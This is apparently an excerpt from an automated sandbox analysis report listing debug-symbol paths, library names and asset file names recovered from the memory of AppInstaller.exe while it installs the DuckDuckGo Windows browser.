Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.PRIVACY.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.WebView.pdb source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Common.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Burning.pdbBdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.PRIVACY.PDB/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.DEPS.JSONdb source: AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.WebView.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.pdb/WINDOWSBROWSER/DBGX.UTIL.DLL source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PUBLIC.PDB/WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PUBLIC.PDB/WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PUBLIC.PDB/WindowsBrowser/DuckDuckGo.VPN.Tray.runtimeconfig.json source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Styles.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.UserPreferences.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.CrashReporting.pdbN.PDBWindowsBrowser/WindowsBrowser.Autocomplete.Public.xml source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.PDB source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /Images/Wide310x150Logo.scale-400.png/IMAGES/WIDE310X150LOGO.SCALE-100.PNG/Images/Wide310x150Logo.scale-150.png/IMAGES/WIDE310X150LOGO.SCALE-150.PNG/Images/Square44x44Logo.scale-200.png/IMAGES/WIDE310X150LOGO.SCALE-125.PNG/Images/Wide310x150Logo.scale-125.png/IMAGES/WIDE310X150LOGO.SCALE-125.PNG/IMAGES/WIDE310X150LOGO.SCALE-150.PNG/IMAGES/WIDE310X150LOGO.SCALE-125.PNG/Images/Wide310x150Logo.scale-100.png/Images/Wide310x150Logo.scale-200.png/WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.PDB/WindowsBrowser/DuckDuckGo.Windows.pdb/WINDOWSBROWSER/THEMES/LIGHT.XAML/WINDOWSBROWSER/DUCKDUCKGO.WINDOWS.PDB source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PDB Rj source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Autocomplete.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Common.pdb/WINDOWSBROWSER/WINDOWSBROWSER.COMMON.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.BOOKMARKS.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: l/WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdbr/WindowsBrowser/WindowsBrowser.UserPreferences.Public.pdb/WindowsBrowser/de/Microsoft.Win32.TaskScheduler.resources.dll source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC926A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: IC.PDB source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdb/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.PDB/WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdb/WindowsBrowser/WindowsBrowser.SecureStorage.pdbc.pdb source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.CrashReporter.pdbDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R.PDB source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.NetworkProtection.pdbg.json source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Autocomplete.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.PDB/WindowsBrowser/DbgX.dll source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.CrashHandler.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/THEMES/DARK.XAML/WINDOWSBROWSER/THEMES/LIGHT.XAMLPNG/WindowsBrowser/DuckDuckGo.WebView.pdb/WindowsBrowser/DuckDuckGo.deps.jsonb/WINDOWSBROWSER/DBGX.INTERFACES.DLL/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.DLL/WindowsBrowser/DbgX.Interfaces.dll/WINDOWSBROWSER/DUCKDUCKGO.VPN.TRAY.PDB/WINDOWSBROWSER/DUCKDUCKGO.DEPS.JSONB/WindowsBrowser/DbgX.Interfaces.dllDB/WindowsBrowser/DuckDuckGo.Updater.dll/WindowsBrowser/DuckDuckGo.deps.json/WindowsBrowser/DbgX.Interfaces.dlldb/WindowsBrowser/DuckDuckGo.Updater.exe/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.EXE/WindowsBrowser/DuckDuckGo.WebView.dll/WindowsBrowser/DuckDuckGo.WebView.dll/WINDOWSBROWSER/DUCKDUCKGO.VPN.TRAY.DLL/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.DLL/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.PDB/WINDOWSBROWSER/DUCKDUCKGO.DEPS.JSON/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.EXE/WindowsBrowser/DuckDuckGo.Updater.pdb/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.PDB/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.PDB/WindowsBrowser/DuckDuckGo.VPN.Tray.dll/WINDOWSBROWSER/DBGX.INTERFACES.DLL/WindowsBrowser/DuckDuckGo.deps.jsonB/WINDOWSBROWSER/DUCKDUCKGO.DEPS.JSONB/WINDOWSBROWSER/DBGX.INTERFACES.DLLb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Privacy.pdb/WINDOWSBROWSER/WINDOWSBROWSER.PRIVACY.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.PDBP source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbWindowsBrowser/NetworkProtection.Grpc.pdbmWindowsBrowser/WindowsBrowser.Autocomplete.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 2.PDB source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Burning.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Styles.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Shared.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.WebView.WebView2.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.PDBb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.Windows.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .SHARED.PDB source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/NetworkProtection.Grpc.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ^/WindowsBrowser/WindowsBrowser.Autocomplete.pdb/WindowsBrowser/WindowsBrowser.NetworkProtection.dlll source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC926A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/COMMANDLINE.DLL/WindowsBrowser/CommandLine.dll/WINDOWSBROWSER/DUCKDUCKGO.PDB source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: h/WindowsBrowser/pt-BR/PresentationCore.resources.dllp/WindowsBrowser/zh-Hans/UIAutomationClient.resources.dlll/WindowsBrowser/zh-Hant/PresentationCore.resources.dlll/WindowsBrowser/pt-BR/UIAutomationClient.resources.dlln/WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdbp/WindowsBrowser/Microsoft.EntityFrameworkCore.Sqlite.dllp/WindowsBrowser/api-ms-win-core-errorhandling-l1-1-0.dlll/WindowsBrowser/zh-Hans/PresentationCore.resources.dll/WindowsBrowser/de/Microsoft.Win32.TaskScheduler.resources.dll source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC926A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Z/WindowsBrowser/Microsoft.Windows.SDK.NET.dll`/WindowsBrowser/WindowsBrowser.SecureStorage.pdb`/WindowsBrowser/WebView2/v8_context_snapshot.binX/WindowsBrowser/WindowsBrowser.Bookmarks.pdbb/WindowsBrowser/Microsoft.Win32.TaskScheduler.dllb/WindowsBrowser/de/PresentationCore.resources.dllX/WindowsBrowser/Images/shadowTrackerDark.png`/WindowsBrowser/WebView2/vk_swiftshader_icd.json^/WindowsBrowser/WebView2/128.0.2739.79.manifest^/WindowsBrowser/System.Windows.Forms.Design.dll/WindowsBrowser/WindowsBrowser.SecureStorage.dllp source: AppInstaller.exe, 00000008.00000002.3031987702.0000019EC946B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbWindowsBrowser/WindowsBrowser.CrashHandler.pdbWindowsBrowser/WindowsBrowser.Common.pdbWindowsBrowser/WindowsBrowser.Common.Wpf.pdbWindowsBrowser/WindowsBrowser.Burning.pdbe.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.VPN.Tray.deps.json/WindowsBrowser/WindowsBrowser.Privacy.pdbon source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 2.pdb source: AppInstaller.exe, 00000008.00000002.3031199453.0000019EC92D8000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.SECURESTORAGE.PDBn.pdb/WindowsBrowser/WindowsBrowser.CrashReporting.pdbpng/WINDOWSBROWSER/DUCKDUCKGO.PERSONALINFOREMOVAL.PDBXML source: AppInstaller.exe, 00000008.00000002.3035019047.0000019EC9992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: X/WindowsBrowser/System.Diagnostics.Debug.dllb/WindowsBrowser/WindowsBrowser.CrashReporting.pdb/WindowsBrowser/WindowsBrowser.DataBrokerProtection.dllX/WindowsBrowser/fr/System.Xaml.resources.dllb/WindowsBrowser/api-ms-win-crt-utility-l1-1-0.dll`/WindowsBrowser/System.ServiceModel.Security.dll^/WindowsBrowser/System.Threading.Overlapped.dll/WindowsBrowser/WindowsBrowser.DataBrokerProtection.dlld/WindowsBrowser/System.Globalization.Calendars.dllb/WindowsBrowser/WindowsBrowser.CrashReporting.dllX/WindowsBrowser/tr/System.Xaml.resources.dll/WindowsBrowser/WindowsBrowser.DataBrokerProtection.dllZ/WindowsBrowser/System.Net.NameResolution.dllX/WindowsBrowser/de/WindowsBase.resources.dllX/WindowsBrowser/Microsoft.AspNetCore.Mvc.dll/WindowsBrowser/WindowsBrowser.DataBrokerProtection.dlld/WindowsBrowser/cs/UIAutomationTypes.resources.dllb/WindowsBrowser/api-ms-win-core-handle-l1-1-0.dllX/WindowsBrowser/es/WindowsBase.resources.dlld/WindowsBrowser/api-ms-win-core-console-l1-2-0.dllb/WindowsBrowser/Microsoft.AspNetCore.Mvc.Cors.dll/WindowsBrowser/WindowsBrowser.DataBrokerProtection.dllf/WindowsBrowser/Microsoft.Web.WebView2.WinForms.dlld/WindowsBrowser/api-ms-win-core-console-l1-1-0.dllf/WindowsBrowser/System.Globalization.Extensions.dll`/WindowsBrowser/System.IO.Compression.Native.dll\/WindowsBrowser/Microsoft.Win32.Primitives.dllX/WindowsBrowser/Microsoft.Win32.Registry.dllX/WindowsBrowser/pl/WindowsBase.resources.dll\/WindowsBrowser/Microsoft.VisualBasic.Core.dll/WindowsBrowser/WindowsBrowser.DataBrokerProtection.dll/WindowsBrowser/WindowsBrowser.NetworkProtection.dllb source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC926A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.NETWORKPROTECTION.PDB/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.pdbPDB/WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PUBLIC.XML/WindowsBrowser/WindowsBrowser.NetworkProtection.pdbON/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.pdbPDB source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.CrashReporter.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbaml source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.UPDATER.DEPS.JSON/WINDOWSBROWSER/WINDOWSBROWSER.PRIVACY.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: http://www.example.com/WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdb source: AppInstaller.exe, 00000008.00000002.3031199453.0000019EC92D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Common.Wpf.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/Themes/Dark.xamlPNG/WindowsBrowser/Themes/Light.xamlPNG/WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.PDB source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Bookmarks.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/MICROSOFT.ASPNETCORE.SIGNALR.PROTOCOLS.JSON.DLL/WINDOWSBROWSER/MICROSOFT.EXTENSIONS.FILEPROVIDERS.EMBEDDED.DLL/WindowsBrowser/Microsoft.Extensions.Identity.Stores.dllN.DLL/WINDOWSBROWSER/WEBVIEW2/SHOW_THIRD_PARTY_SOFTWARE_LICENSES.BAT/WINDOWSBROWSER/MICROSOFT.ASPNETCORE.MVC.DATAANNOTATIONS.DLL/WindowsBrowser/WebView2/show_third_party_software_licenses.bat/Images/Square44x44Logo.altform-unplated_targetsize-16.png.PNG/Images/Square44x44Logo.altform-lightunplated_targetsize-32.png/Images/Square44x44Logo.altform-lightunplated_targetsize-48.png/IMAGES/SQUARE44X44LOGO.ALTFORM-LIGHTUNPLATED_TARGETSIZE-16.PNG/Images/Square44x44Logo.targetsize-24_altform-unplated.pngpng/IMAGES/SQUARE44X44LOGO.ALTFORM-UNPLATED_TARGETSIZE-256.PNG/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.SHARED.PDB source: AppInstaller.exe, 00000008.00000002.3034817725.0000019EC991D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /IMAGES/SQUARE44X44LOGO.TARGETSIZE-48.PNGe.sig/WindowsBrowser/DuckDuckGo.WebView.WebView2.pdb/IMAGES/SQUARE44X44LOGO.TARGETSIZE-16.PNGl/WINDOWSBROWSER/WINDOWSBROWSER.STYLES.PDBLpdb/WINDOWSBROWSER/WINDOWSBROWSER.COMMON.PDB2.pdb/WINDOWSBROWSER/WINDOWSBROWSER.AUTOCOMPLETE.PDB/WindowsBrowser/WindowsBrowser.Bookmarks.pdbdb source: AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.UserPreferences.Public.pdb.pdb/IMAGES/SQUARE44X44LOGO.ALTFORM-UNPLATED_TARGETSIZE-16.PNGals/WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.RUNTIMECONFIG.JSONdb source: AppInstaller.exe, 00000008.00000002.3034817725.0000019EC991D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WebView2/Components/CertificateRevocation/6498.2023.8.1/crl-sethttp://www.example.com/WindowsBrowser/WindowsBrowser.Sync.Crypto.Managed.dlllhttp://www.example.com/WindowsBrowser/WindowsBrowser.NetworkProtection.pdb.dll/WindowsBrowser/WebView2/copilot_provider_msix/copilot_provider_neutral.msixl source: AppInstaller.exe, 00000008.00000002.3034675400.0000019EC98F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.VPN.Tray.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
